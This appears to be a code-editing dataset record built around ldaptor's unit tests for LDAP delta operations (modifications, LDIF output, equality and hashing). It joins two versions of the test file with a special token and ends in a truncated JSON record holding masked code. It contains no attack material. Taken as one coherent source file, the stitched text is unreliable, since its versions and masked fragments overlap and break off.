        left = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com'))
        right = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com'))
        self.assertEqual(hash(left), hash(right))

    def testDeleteOpHashDifferent(self):
        """
        Unequal operations hash differently.
        """
        left = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com'))
        right = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com'))
        self.assertNotEqual(hash(left), hash(right))

    def testDeleteOp_DNNotFound(self):
        """
        Deleting a DN that is absent from the tree fails with
        LDAPNoSuchObject.
        """
        root = self.getRoot()
        op = delta.DeleteOp('cn=nope,dc=example,dc=com')
        failure = self.failureResultOf(op.patch(root))
        self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)

    def testDeleteOpInvalidDN(self):
        """
        Invalid type of DN raises AssertionError
        """
        self.assertRaises(AssertionError, delta.DeleteOp, 0)

    def testRepr(self):
        """
        Getting string representation
        """
        op = delta.DeleteOp('dc=example,dc=com')
        self.assertEqual(repr(op), "DeleteOp('dc=example,dc=com')")
class TestModifyOp(OperationTestCase):
    """
    Unit tests for ModifyOp.
    """

    def testAsLDIF(self):
        """
        It will return a LDIF representation of the contained operations.
        """
        op = delta.ModifyOp(
            'cn=Paula Jensen, ou=Dev Ops, dc=airius, dc=com',
            [
                delta.Add('postaladdress',
                          ['123 Anystreet $ Sunnyvale, CA $ 94086']),
                delta.Delete('description'),
                delta.Replace('telephonenumber',
                              ['+1 408 555 1234', '+1 408 555 5678']),
                delta.Delete('facsimiletelephonenumber',
                             ['+1 408 555 9876']),
            ])
        self.assertEqual(
            b'dn: cn=Paula Jensen,ou=Dev Ops,dc=airius,dc=com\nchangetype: modify\nadd: postaladdress\npostaladdress: 123 Anystreet $ Sunnyvale, CA $ 94086\n-\ndelete: description\n-\nreplace: telephonenumber\ntelephonenumber: +1 408 555 1234\ntelephonenumber: +1 408 555 5678\n-\ndelete: facsimiletelephonenumber\nfacsimiletelephonenumber: +1 408 555 9876\n-\n\n',
            op.asLDIF())

    def testInequalityDiffertnDN(self):
        """
        Modify operations for different DN are not equal.
        """
        left = delta.ModifyOp('cn=john,dc=example,dc=com',
                              [delta.Delete('description')])
        right = delta.ModifyOp('cn=doe,dc=example,dc=com',
                               [delta.Delete('description')])
        self.assertNotEqual(left, right)

    def testInequalityDifferentModifications(self):
        """
        Modify operations with different modifications are not equal
        """
        left = delta.ModifyOp('cn=john,dc=example,dc=com',
                              [delta.Add('description')])
        right = delta.ModifyOp('cn=john,dc=example,dc=com',
                               [delta.Delete('description')])
        self.assertNotEqual(left, right)

    def testInequalityNotModifyOP(self):
        """
        Modify operations are not equal with other object types.
        """
        op = delta.ModifyOp('cn=john,dc=example,dc=com',
                            [delta.Delete('description')])
        self.assertNotEqual('cn=john,dc=example,dc=com', op)

    def testInequalityDiffertnOperations(self):
        """
        Operations differing in both DN and modification are not equal.
        """
        left = delta.ModifyOp('cn=john,dc=example,dc=com',
                              [delta.Delete('description')])
        right = delta.ModifyOp('cn=doe,dc=example,dc=com',
                               [delta.Delete('homeDirectory')])
        self.assertNotEqual(left, right)

    def testHashEquality(self):
        """
        Modify operations can be hashed and equal objects have the same
        hash.
        """
        left = delta.ModifyOp('cn=john,dc=example,dc=com',
                              [delta.Delete('description')])
        right = delta.ModifyOp('cn=john,dc=example,dc=com',
                               [delta.Delete('description')])
        self.assertEqual(left, right)
        self.assertEqual(left.asLDIF(), right.asLDIF(),
                         'LDIF equality is a precondition for valid hash values')
        self.assertEqual(hash(left), hash(right))

    def testHashInequality(self):
        """
        Different modify operations have different hash values.
        """
        left = delta.ModifyOp('cn=john,dc=example,dc=com',
                              [delta.Delete('description')])
        right = delta.ModifyOp('cn=john,dc=example,dc=com',
                               [delta.Delete('homeDirectory')])
        self.assertNotEqual(left.asLDIF(), right.asLDIF())
        self.assertNotEqual(hash(left), hash(right))

    def testModifyOp_DNNotFound(self):
        """
        Patching a tree that lacks the target DN fails with
        LDAPNoSuchObject.
        """
        root = self.getRoot()
        op = delta.ModifyOp('cn=nope,dc=example,dc=com',
                            [delta.Add('foo', ['bar'])])
        failure = self.failureResultOf(op.patch(root))
        self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)

    def testRepr(self):
        """
        Getting string representation
        """
        op = delta.ModifyOp('cn=john,dc=example,dc=com',
                            [delta.Delete('description')])
        self.assertEqual(
            repr(op),
            "ModifyOp(dn='cn=john,dc=example,dc=com', modifications=[Delete('description', [])])")
class TestModificationComparison(unittest.TestCase):
    """
    Equality comparisons of modifications against each other and against
    plain value types.
    """

    def testEquality_Add_True(self):
        # Same modification type, key and values: equal.
        left = delta.Add('k', ['b', 'c', 'd'])
        right = delta.Add('k', ['b', 'c', 'd'])
        self.assertEqual(left, right)

    def testEquality_AddVsDelete_False(self):
        # Identical payload, different modification type: not equal.
        left = delta.Add('k', ['b', 'c', 'd'])
        right = delta.Delete('k', ['b', 'c', 'd'])
        self.assertNotEqual(left, right)

    def testEquality_AttributeSet_False(self):
        # A raw attribute set is not a modification.
        left = delta.Add('k', ['b', 'c', 'd'])
        right = attributeset.LDAPAttributeSet('k', ['b', 'c', 'd'])
        self.assertNotEqual(left, right)

    def testEquality_List_False(self):
        # A bare list never compares equal to a modification.
        left = delta.Add('k', ['b', 'c', 'd'])
        right = ['b', 'c', 'd']
        self.assertNotEqual(left, right)
<|reserved_special_token_1|>
"""
Test cases for ldaptor.protocols.ldap.delta
"""
from twisted.trial import unittest
from ldaptor import delta, entry, attributeset, inmemory
from ldaptor.protocols.ldap import ldapsyntax, distinguishedname, ldaperrors
class TestModifications(unittest.TestCase):
    """
    Applying individual Add/Delete/Replace modifications to an LDAP entry
    via their patch() method.
    """

    def setUp(self):
        # A fresh entry per test; every test mutates it through patch().
        self.foo = ldapsyntax.LDAPEntry(
            None,
            dn="cn=foo,dc=example,dc=com",
            attributes={
                "objectClass": ["person"],
                "cn": ["foo", "thud"],
                "sn": ["bar"],
                "more": ["junk"],
            },
        )

    def testAddOld(self):
        # Adding to an existing attribute appends the new values.
        modification = delta.Add("cn", ["quux"])
        modification.patch(self.foo)
        self.assertNotIn("stuff", self.foo)
        self.assertEqual(["foo", "thud", "quux"], self.foo["cn"])

    def testAddNew(self):
        # Adding a previously-absent attribute creates it.
        modification = delta.Add("stuff", ["val1", "val2"])
        modification.patch(self.foo)
        self.assertEqual(["val1", "val2"], self.foo["stuff"])
        self.assertEqual(["foo", "thud"], self.foo["cn"])

    def testDelete(self):
        # Deleting one value leaves the remaining values intact.
        modification = delta.Delete("cn", ["thud"])
        modification.patch(self.foo)
        self.assertNotIn("stuff", self.foo)
        self.assertEqual(["foo"], self.foo["cn"])

    def testDeleteAll(self):
        # Deleting with no value list removes the whole attribute.
        modification = delta.Delete("more")
        modification.patch(self.foo)
        self.assertNotIn("stuff", self.foo)
        self.assertEqual(["foo", "thud"], self.foo["cn"])

    def testDelete_FailOnNonExistingAttributeType_All(self):
        modification = delta.Delete("notexist", [])
        self.assertRaises(KeyError, modification.patch, self.foo)

    def testDelete_FailOnNonExistingAttributeType_OneValue(self):
        modification = delta.Delete("notexist", ["a"])
        self.assertRaises(KeyError, modification.patch, self.foo)

    def testDelete_FailOnNonExistingAttributeValue(self):
        modification = delta.Delete("cn", ["notexist"])
        self.assertRaises(LookupError, modification.patch, self.foo)

    def testReplace_Add(self):
        # Replace on a missing attribute behaves like an add.
        modification = delta.Replace("stuff", ["val1", "val2"])
        modification.patch(self.foo)
        self.assertEqual(["val1", "val2"], self.foo["stuff"])
        self.assertEqual(["bar"], self.foo["sn"])
        self.assertEqual(["junk"], self.foo["more"])

    def testReplace_Modify(self):
        # Replace on an existing attribute swaps its values wholesale.
        modification = delta.Replace("sn", ["baz"])
        modification.patch(self.foo)
        self.assertNotIn("stuff", self.foo)
        self.assertEqual(["baz"], self.foo["sn"])
        self.assertEqual(["junk"], self.foo["more"])

    def testReplace_Delete_Existing(self):
        # Replace with an empty value list removes the attribute.
        modification = delta.Replace("more", [])
        modification.patch(self.foo)
        self.assertNotIn("stuff", self.foo)
        self.assertEqual(["bar"], self.foo["sn"])
        self.assertNotIn("more", self.foo)

    def testReplace_Delete_NonExisting(self):
        # Replacing a missing attribute with nothing is a silent no-op.
        modification = delta.Replace("nonExisting", [])
        modification.patch(self.foo)
        self.assertNotIn("stuff", self.foo)
        self.assertEqual(["bar"], self.foo["sn"])
        self.assertEqual(["junk"], self.foo["more"])
class TestModificationOpLDIF(unittest.TestCase):
    """
    LDIF serialization of the individual modification operations.

    Each serialized modification ends with a lone "-" separator line.
    """

    def testAdd(self):
        operation = delta.Add("foo", ["bar", "baz"])
        self.assertEqual(
            b"add: foo\nfoo: bar\nfoo: baz\n-\n", operation.asLDIF()
        )

    def testDelete(self):
        operation = delta.Delete("foo", ["bar", "baz"])
        self.assertEqual(
            b"delete: foo\nfoo: bar\nfoo: baz\n-\n", operation.asLDIF()
        )

    def testDeleteAll(self):
        # Omitting the value list means "delete the whole attribute".
        operation = delta.Delete("foo")
        self.assertEqual(b"delete: foo\n-\n", operation.asLDIF())

    def testReplace(self):
        operation = delta.Replace("foo", ["bar", "baz"])
        self.assertEqual(
            b"replace: foo\nfoo: bar\nfoo: baz\n-\n", operation.asLDIF()
        )

    def testReplaceAll(self):
        # A bare Replace (no values) serializes with no value lines.
        operation = delta.Replace("thud")
        self.assertEqual(b"replace: thud\n-\n", operation.asLDIF())

    def testAddBase64(self):
        """
        LDIF attribute representation is base64 encoded
        if attribute value contains nonprintable characters
        or starts with reserved characters
        """
        operation = delta.Add("attr", [":value1", "value\n\r2"])
        # "attr::" (double colon) marks base64-encoded values.
        self.assertEqual(
            b"add: attr\nattr:: OnZhbHVlMQ==\nattr:: dmFsdWUKDTI=\n-\n",
            operation.asLDIF(),
        )
class OperationTestCase(unittest.TestCase):
    """
    Test case for operations on a LDAP tree.
    """

    def getRoot(self):
        """
        Returns a new LDAP root for dc=example,dc=com.
        """
        base_dn = distinguishedname.DistinguishedName("dc=example,dc=com")
        return inmemory.ReadOnlyInMemoryLDAPEntry(dn=base_dn)
class TestAddOpLDIF(OperationTestCase):
    """
    Unit tests for `AddOp`.
    """

    def testAsLDIF(self):
        """
        It will return the LDIF representation of the operation.
        """
        operation = delta.AddOp(
            entry.BaseLDAPEntry(
                dn="dc=example,dc=com",
                attributes={"foo": ["bar", "baz"], "quux": ["thud"]},
            )
        )
        # Trailing blank line terminates the LDIF change record.
        expected = (
            b"dn: dc=example,dc=com\n"
            b"changetype: add\n"
            b"foo: bar\n"
            b"foo: baz\n"
            b"quux: thud\n"
            b"\n"
        )
        self.assertEqual(expected, operation.asLDIF())

    def testAddOpEqualitySameEntry(self):
        """
        Objects are equal when the have the same LDAP entry.
        """
        left = delta.AddOp(
            entry.BaseLDAPEntry(
                dn="ou=Duplicate Team, dc=example,dc=com",
                attributes={"foo": ["same", "attributes"]},
            )
        )
        right = delta.AddOp(
            entry.BaseLDAPEntry(
                dn="ou=Duplicate Team, dc=example,dc=com",
                attributes={"foo": ["same", "attributes"]},
            )
        )
        self.assertEqual(left, right)

    def testAddOpInequalityDifferentEntry(self):
        """
        Objects are not equal when the have different LDAP entries.
        """
        left = delta.AddOp(
            entry.BaseLDAPEntry(
                dn="ou=First Team, dc=example,dc=com",
                attributes={"foo": ["same", "attributes"]},
            )
        )
        right = delta.AddOp(
            entry.BaseLDAPEntry(
                dn="ou=First Team, dc=example,dc=com",
                attributes={"foo": ["other", "attributes"]},
            )
        )
        self.assertNotEqual(left, right)

    def testAddOpInequalityNoEntryObject(self):
        """
        Objects is not equal with random objects.
        """
        operation = delta.AddOp(
            entry.BaseLDAPEntry(
                dn="ou=Duplicate Team, dc=example,dc=com",
                attributes={"foo": ["same", "attributes"]},
            )
        )
        self.assertNotEqual(operation, {"foo": ["same", "attributes"]})

    def testAddOpHashSimilar(self):
        """
        Objects which are equal have the same hash.
        """
        left = delta.AddOp(
            entry.BaseLDAPEntry(
                dn="ou=Duplicate Team, dc=example,dc=com",
                attributes={"foo": ["same", "attributes"]},
            )
        )
        right = delta.AddOp(
            entry.BaseLDAPEntry(
                dn="ou=Duplicate Team, dc=example,dc=com",
                attributes={"foo": ["same", "attributes"]},
            )
        )
        self.assertEqual(hash(left), hash(right))

    def testAddOpHashDifferent(self):
        """
        Objects which are not equal have different hash.
        """
        left = delta.AddOp(
            entry.BaseLDAPEntry(
                dn="ou=Duplicate Team, dc=example,dc=com",
                attributes={"foo": ["one", "attributes"]},
            )
        )
        right = delta.AddOp(
            entry.BaseLDAPEntry(
                dn="ou=Duplicate Team, dc=example,dc=com",
                attributes={"foo": ["other", "attributes"]},
            )
        )
        self.assertNotEqual(hash(left), hash(right))

    def testAddOp_DNExists(self):
        """
        It fails to perform the `add` operation for an existing entry.
        """
        root = self.getRoot()
        root.addChild(
            rdn="ou=Existing Team",
            attributes={"objectClass": ["a", "b"], "ou": ["HR"]},
        )
        operation = delta.AddOp(
            entry.BaseLDAPEntry(
                dn="ou=Existing Team, dc=example,dc=com",
                attributes={"foo": ["dont", "care"]},
            )
        )
        failure = self.failureResultOf(operation.patch(root))
        self.assertIsInstance(failure.value, ldaperrors.LDAPEntryAlreadyExists)

    def testRepr(self):
        """
        Getting string representation
        """
        operation = delta.AddOp(
            entry.BaseLDAPEntry(
                dn="dc=example,dc=com",
                attributes={"bar": ["foo"], "foo": ["bar"]},
            )
        )
        expected = (
            "AddOp(BaseLDAPEntry('dc=example,dc=com', "
            "{'bar': ['foo'], 'foo': ['bar']}))"
        )
        self.assertEqual(expected, repr(operation))
class TestDeleteOpLDIF(OperationTestCase):
    """
    Unit tests for DeleteOp.
    """

    def testAsLDIF(self):
        """
        It return the LDIF representation of the delete operation.
        """
        operation = delta.DeleteOp("dc=example,dc=com")
        expected = b"dn: dc=example,dc=com\nchangetype: delete\n\n"
        self.assertEqual(expected, operation.asLDIF())

    def testDeleteOpEqualitySameDN(self):
        """
        Objects are equal when the have the same DN.
        """
        left = delta.DeleteOp(entry.BaseLDAPEntry(dn="ou=Team, dc=example,dc=com"))
        right = delta.DeleteOp(entry.BaseLDAPEntry(dn="ou=Team, dc=example,dc=com"))
        self.assertEqual(left, right)

    def testDeleteOpEqualityEqualDN(self):
        """
        DeleteOp objects are equal if their DNs are equal.
        """
        # Three equivalent spellings of the same DN: a DistinguishedName,
        # an entry object, and a plain string.
        from_dn = delta.DeleteOp(
            distinguishedname.DistinguishedName(
                stringValue="ou=Team,dc=example,dc=com"
            )
        )
        from_entry = delta.DeleteOp(
            entry.BaseLDAPEntry(dn="ou=Team, dc=example, dc=com")
        )
        from_string = delta.DeleteOp("ou=Team, dc=example,dc=com")
        self.assertEqual(from_dn, from_entry)
        self.assertEqual(from_dn, from_string)

    def testDeleteOpInequalityDifferentEntry(self):
        """
        DeleteOp objects are not equal when the have different LDAP entries.
        """
        left = delta.DeleteOp(entry.BaseLDAPEntry(dn="ou=Team, dc=example,dc=com"))
        right = delta.DeleteOp(
            entry.BaseLDAPEntry(dn="ou=Cowboys, dc=example,dc=com")
        )
        self.assertNotEqual(left, right)

    def testDeleteOpInequalityNoEntryObject(self):
        """
        DeleteOp objects is not equal with random objects.
        """
        operation = delta.DeleteOp(
            entry.BaseLDAPEntry(dn="ou=Team, dc=example,dc=com")
        )
        self.assertNotEqual(operation, "ou=Team, dc=example,dc=com")

    def testDeleteOpHashSimilar(self):
        """
        Objects which are equal have the same hash.
        """
        left = delta.DeleteOp(entry.BaseLDAPEntry(dn="ou=Team, dc=example,dc=com"))
        right = delta.DeleteOp(entry.BaseLDAPEntry(dn="ou=Team, dc=example,dc=com"))
        self.assertEqual(hash(left), hash(right))

    def testDeleteOpHashDifferent(self):
        """
        Objects which are not equal have different hash.
        """
        left = delta.DeleteOp(entry.BaseLDAPEntry(dn="ou=Team, dc=example,dc=com"))
        right = delta.DeleteOp(
            entry.BaseLDAPEntry(dn="ou=Cowboys, dc=example,dc=com")
        )
        self.assertNotEqual(hash(left), hash(right))

    def testDeleteOp_DNNotFound(self):
        """
        If fail to delete when the RDN does not exists.
        """
        root = self.getRoot()
        operation = delta.DeleteOp("cn=nope,dc=example,dc=com")
        failure = self.failureResultOf(operation.patch(root))
        self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)

    def testDeleteOpInvalidDN(self):
        """
        Invalid type of DN raises AssertionError
        """
        with self.assertRaises(AssertionError):
            delta.DeleteOp(0)

    def testRepr(self):
        """
        Getting string representation
        """
        operation = delta.DeleteOp("dc=example,dc=com")
        self.assertEqual("DeleteOp('dc=example,dc=com')", repr(operation))
class TestModifyOp(OperationTestCase):
    """
    Unit tests for ModifyOp.
    """

    def testAsLDIF(self):
        """
        It will return a LDIF representation of the contained operations.
        """
        operation = delta.ModifyOp(
            "cn=Paula Jensen, ou=Dev Ops, dc=airius, dc=com",
            [
                delta.Add(
                    "postaladdress", ["123 Anystreet $ Sunnyvale, CA $ 94086"]
                ),
                delta.Delete("description"),
                delta.Replace(
                    "telephonenumber", ["+1 408 555 1234", "+1 408 555 5678"]
                ),
                delta.Delete("facsimiletelephonenumber", ["+1 408 555 9876"]),
            ],
        )
        # DN spaces after commas are dropped; each modification ends with
        # a lone "-" line, and the record ends with a blank line.
        expected = (
            b"dn: cn=Paula Jensen,ou=Dev Ops,dc=airius,dc=com\n"
            b"changetype: modify\n"
            b"add: postaladdress\n"
            b"postaladdress: 123 Anystreet $ Sunnyvale, CA $ 94086\n"
            b"-\n"
            b"delete: description\n"
            b"-\n"
            b"replace: telephonenumber\n"
            b"telephonenumber: +1 408 555 1234\n"
            b"telephonenumber: +1 408 555 5678\n"
            b"-\n"
            b"delete: facsimiletelephonenumber\n"
            b"facsimiletelephonenumber: +1 408 555 9876\n"
            b"-\n"
            b"\n"
        )
        self.assertEqual(expected, operation.asLDIF())

    def testInequalityDiffertnDN(self):
        """
        Modify operations for different DN are not equal.
        """
        left = delta.ModifyOp(
            "cn=john,dc=example,dc=com", [delta.Delete("description")]
        )
        right = delta.ModifyOp(
            "cn=doe,dc=example,dc=com", [delta.Delete("description")]
        )
        self.assertNotEqual(left, right)

    def testInequalityDifferentModifications(self):
        """
        Modify operations with different modifications are not equal
        """
        left = delta.ModifyOp(
            "cn=john,dc=example,dc=com", [delta.Add("description")]
        )
        right = delta.ModifyOp(
            "cn=john,dc=example,dc=com", [delta.Delete("description")]
        )
        self.assertNotEqual(left, right)

    def testInequalityNotModifyOP(self):
        """
        Modify operations are not equal with other object types.
        """
        operation = delta.ModifyOp(
            "cn=john,dc=example,dc=com", [delta.Delete("description")]
        )
        self.assertNotEqual("cn=john,dc=example,dc=com", operation)

    def testInequalityDiffertnOperations(self):
        """
        Modify operations for same DN but different operations are not equal.
        """
        # NOTE(review): the DNs differ here too (john vs doe), so this does
        # not isolate "same DN, different operations"; confirm intent.
        left = delta.ModifyOp(
            "cn=john,dc=example,dc=com", [delta.Delete("description")]
        )
        right = delta.ModifyOp(
            "cn=doe,dc=example,dc=com", [delta.Delete("homeDirectory")]
        )
        self.assertNotEqual(left, right)

    def testHashEquality(self):
        """
        Modify operations can be hashed and equal objects have the same
        hash.
        """
        left = delta.ModifyOp(
            "cn=john,dc=example,dc=com", [delta.Delete("description")]
        )
        right = delta.ModifyOp(
            "cn=john,dc=example,dc=com", [delta.Delete("description")]
        )
        self.assertEqual(left, right)
        self.assertEqual(
            left.asLDIF(),
            right.asLDIF(),
            "LDIF equality is a precondition for valid hash values",
        )
        self.assertEqual(hash(left), hash(right))

    def testHashInequality(self):
        """
        Different modify operations have different hash values.
        """
        left = delta.ModifyOp(
            "cn=john,dc=example,dc=com", [delta.Delete("description")]
        )
        right = delta.ModifyOp(
            "cn=john,dc=example,dc=com", [delta.Delete("homeDirectory")]
        )
        self.assertNotEqual(left.asLDIF(), right.asLDIF())
        self.assertNotEqual(hash(left), hash(right))

    def testModifyOp_DNNotFound(self):
        """
        If fail to modify when the RDN does not exists.
        """
        root = self.getRoot()
        operation = delta.ModifyOp(
            "cn=nope,dc=example,dc=com", [delta.Add("foo", ["bar"])]
        )
        failure = self.failureResultOf(operation.patch(root))
        self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)

    def testRepr(self):
        """
        Getting string representation
        """
        operation = delta.ModifyOp(
            "cn=john,dc=example,dc=com", [delta.Delete("description")]
        )
        expected = (
            "ModifyOp(dn='cn=john,dc=example,dc=com', "
            "modifications=[Delete('description', [])])"
        )
        self.assertEqual(expected, repr(operation))
class TestModificationComparison(unittest.TestCase):
    """
    Equality semantics between modifications and other value types.
    """

    def testEquality_Add_True(self):
        # Same type, key and values compare equal.
        self.assertEqual(
            delta.Add("k", ["b", "c", "d"]), delta.Add("k", ["b", "c", "d"])
        )

    def testEquality_AddVsDelete_False(self):
        # Same payload but different modification type: not equal.
        self.assertNotEqual(
            delta.Add("k", ["b", "c", "d"]), delta.Delete("k", ["b", "c", "d"])
        )

    def testEquality_AttributeSet_False(self):
        # A plain attribute set is not a modification.
        self.assertNotEqual(
            delta.Add("k", ["b", "c", "d"]),
            attributeset.LDAPAttributeSet("k", ["b", "c", "d"]),
        )

    def testEquality_List_False(self):
        # A bare list never compares equal to a modification.
        self.assertNotEqual(delta.Add("k", ["b", "c", "d"]), ["b", "c", "d"])
|
flexible
|
{
"blob_id": "8054ccb07d0130b75927a4bb9b712ce3d564b8fe",
"index": 4702,
"step-1": "<mask token>\n\n\nclass TestModificationOpLDIF(unittest.TestCase):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def testReplaceAll(self):\n m = delta.Replace('thud')\n self.assertEqual(m.asLDIF(), b'replace: thud\\n-\\n')\n <mask token>\n\n\nclass OperationTestCase(unittest.TestCase):\n \"\"\"\n Test case for operations on a LDAP tree.\n \"\"\"\n\n def getRoot(self):\n \"\"\"\n Returns a new LDAP root for dc=example,dc=com.\n \"\"\"\n return inmemory.ReadOnlyInMemoryLDAPEntry(dn=distinguishedname.\n DistinguishedName('dc=example,dc=com'))\n\n\nclass TestAddOpLDIF(OperationTestCase):\n \"\"\"\n Unit tests for `AddOp`.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It will return the LDIF representation of the operation.\n \"\"\"\n sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',\n attributes={'foo': ['bar', 'baz'], 'quux': ['thud']}))\n result = sut.asLDIF()\n self.assertEqual(\n b'dn: dc=example,dc=com\\nchangetype: add\\nfoo: bar\\nfoo: baz\\nquux: thud\\n\\n'\n , result)\n\n def testAddOpEqualitySameEntry(self):\n \"\"\"\n Objects are equal when the have the same LDAP entry.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertEqual(first, second)\n\n def testAddOpInequalityDifferentEntry(self):\n \"\"\"\n Objects are not equal when the have different LDAP entries.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=First Team, dc=example,dc=com', attributes={'foo': ['same',\n 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=First Team, dc=example,dc=com', attributes={'foo': ['other',\n 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertNotEqual(first, 
second)\n\n def testAddOpInequalityNoEntryObject(self):\n \"\"\"\n Objects is not equal with random objects.\n \"\"\"\n team_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n sut = delta.AddOp(team_entry)\n self.assertNotEqual(sut, {'foo': ['same', 'attributes']})\n\n def testAddOpHashSimilar(self):\n \"\"\"\n Objects which are equal have the same hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertEqual(hash(first), hash(second))\n\n def testAddOpHashDifferent(self):\n \"\"\"\n Objects which are not equal have different hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'one', 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'other', 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertNotEqual(hash(first), hash(second))\n\n def testAddOp_DNExists(self):\n \"\"\"\n It fails to perform the `add` operation for an existing entry.\n \"\"\"\n root = self.getRoot()\n root.addChild(rdn='ou=Existing Team', attributes={'objectClass': [\n 'a', 'b'], 'ou': ['HR']})\n hr_entry = entry.BaseLDAPEntry(dn=\n 'ou=Existing Team, dc=example,dc=com', attributes={'foo': [\n 'dont', 'care']})\n sut = delta.AddOp(hr_entry)\n deferred = sut.patch(root)\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPEntryAlreadyExists)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',\n attributes={'bar': 
['foo'], 'foo': ['bar']}))\n self.assertEqual(repr(sut),\n \"AddOp(BaseLDAPEntry('dc=example,dc=com', {'bar': ['foo'], 'foo': ['bar']}))\"\n )\n\n\nclass TestDeleteOpLDIF(OperationTestCase):\n \"\"\"\n Unit tests for DeleteOp.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It return the LDIF representation of the delete operation.\n \"\"\"\n sut = delta.DeleteOp('dc=example,dc=com')\n result = sut.asLDIF()\n self.assertEqual(b'dn: dc=example,dc=com\\nchangetype: delete\\n\\n',\n result)\n\n def testDeleteOpEqualitySameDN(self):\n \"\"\"\n Objects are equal when the have the same DN.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertEqual(first, second)\n\n def testDeleteOpEqualityEqualDN(self):\n \"\"\"\n DeleteOp objects are equal if their DNs are equal.\n \"\"\"\n first_dn = distinguishedname.DistinguishedName(stringValue=\n 'ou=Team,dc=example,dc=com')\n first = delta.DeleteOp(first_dn)\n second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example, dc=com')\n second = delta.DeleteOp(second_entry)\n third = delta.DeleteOp('ou=Team, dc=example,dc=com')\n self.assertEqual(first, second)\n self.assertEqual(first, third)\n\n def testDeleteOpInequalityDifferentEntry(self):\n \"\"\"\n DeleteOp objects are not equal when the have different LDAP entries.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertNotEqual(first, second)\n\n def testDeleteOpInequalityNoEntryObject(self):\n \"\"\"\n DeleteOp objects is not equal with random objects.\n \"\"\"\n team_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n sut = delta.DeleteOp(team_entry)\n self.assertNotEqual(sut, 'ou=Team, 
dc=example,dc=com')\n\n def testDeleteOpHashSimilar(self):\n \"\"\"\n Objects which are equal have the same hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertEqual(hash(first), hash(second))\n\n def testDeleteOpHashDifferent(self):\n \"\"\"\n Objects which are not equal have different hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertNotEqual(hash(first), hash(second))\n\n def testDeleteOp_DNNotFound(self):\n \"\"\"\n If fail to delete when the RDN does not exists.\n \"\"\"\n root = self.getRoot()\n sut = delta.DeleteOp('cn=nope,dc=example,dc=com')\n deferred = sut.patch(root)\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)\n\n def testDeleteOpInvalidDN(self):\n \"\"\"\n Invalid type of DN raises AssertionError\n \"\"\"\n self.assertRaises(AssertionError, delta.DeleteOp, 0)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.DeleteOp('dc=example,dc=com')\n self.assertEqual(repr(sut), \"DeleteOp('dc=example,dc=com')\")\n\n\nclass TestModifyOp(OperationTestCase):\n \"\"\"\n Unit tests for ModifyOp.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It will return a LDIF representation of the contained operations.\n \"\"\"\n sut = delta.ModifyOp('cn=Paula Jensen, ou=Dev Ops, dc=airius, dc=com',\n [delta.Add('postaladdress', [\n '123 Anystreet $ Sunnyvale, CA $ 94086']), delta.Delete(\n 'description'), delta.Replace('telephonenumber', [\n '+1 